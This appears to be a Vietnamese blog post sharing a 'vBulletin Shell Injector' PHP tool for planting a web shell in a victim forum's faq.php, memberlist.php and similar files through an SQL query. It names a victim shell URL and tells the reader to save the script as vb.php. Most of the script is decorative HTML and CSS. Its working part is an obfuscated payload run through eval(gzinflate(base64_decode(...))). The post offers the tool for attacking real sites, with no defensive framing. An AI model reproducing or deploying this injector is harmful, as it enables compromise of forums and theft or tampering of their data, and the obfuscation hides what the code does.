AdminCP (/admincp/) của victim đã được bảo vệ (.htpasswd) hoặc hide URL.
Shell có thể được inject vào những file sau:
faq.php, memberlist.php, search.php, calendar.php, showgroups.phpShell URL: http://victim.com/faq.php
Script (lưu thành vb.php)
PHP Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>~ vBulletin ShELL InjEctOr ~</title>
<style type="text/css">
<style type="text/css">
<?
/*
#############################
Coded By IraQiaN-r0x
myr1z@yahoo.com
############################
*/?>body {
scrollbar-face-color:#0e0e0e;
scrollbar-highlight-color:#0e0e0e;
scrollbar-3dlight-color:#1a1a1a;
scrollbar-darkshadow-color:#0e0e0e;
scrollbar-shadow-color:#1a1a1a;
scrollbar-arrow-color:#990033;
scrollbar-track-color:#000000;
}
*{margin: 0; padding: 0;}
body{text-align: center;
font: 11px Tahoma;
color: #333333;
background: #EEEEEE url(http://img401.imageshack.us/img401/9725/511z.gif);
}
a{color:#970000;
text-decoration: none;
}
a:hover {text-decoration: none;
color: #470000;
}
.box {background-color: #000;
border: 4px solid #090909;
padding: 5px;
margin-bottom: 10px;
width : 40%;
}
.box h3 {background-color: #470000;
color: #a7a7a7;
font-size: 11px;
padding: 7px;
margin-bottom: 5px;
}
#comments form p {margin-bottom: 5px;}
#comments form input {margin-right: 5px;}
#comments form input, textarea {border: 1px solid #cccccc;
font-size: 11px;
font-family: tahoma;
padding: 4px;
background-position: 4px 4px;
background-repeat: no-repeat;
}
#comments form input {border: 1px solid #cccccc;
}
#comments form textarea {padding: 4px 4px !important;
border: 1px solid #cccccc;
}
#comments form button {border: 1px solid #a0a0a0;
font-size: 1em;
font-family: Verdana;
padding: 2px 6px;
}
</style>
</head>
<body>
<br />
<br />
<br />
<div align="center">
<div class="box">
<h3>:: Shell injEcTiOn By SQL QuEry ::</h3>
<?php
$r0x = "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";/*======================================================================*\
|| #################################################################### ||
|| # ~ vBulletin ShELL InjEctOr ~ # ||
|| # CodEd By IraQiaN-r0x # ||
|| # myr1z@yahoo.com # ||
|| #################################################################### ||
\*======================================================================*/eval(gzinflate(base64_decode("$r0x")));?>
Không có nhận xét nào:
Đăng nhận xét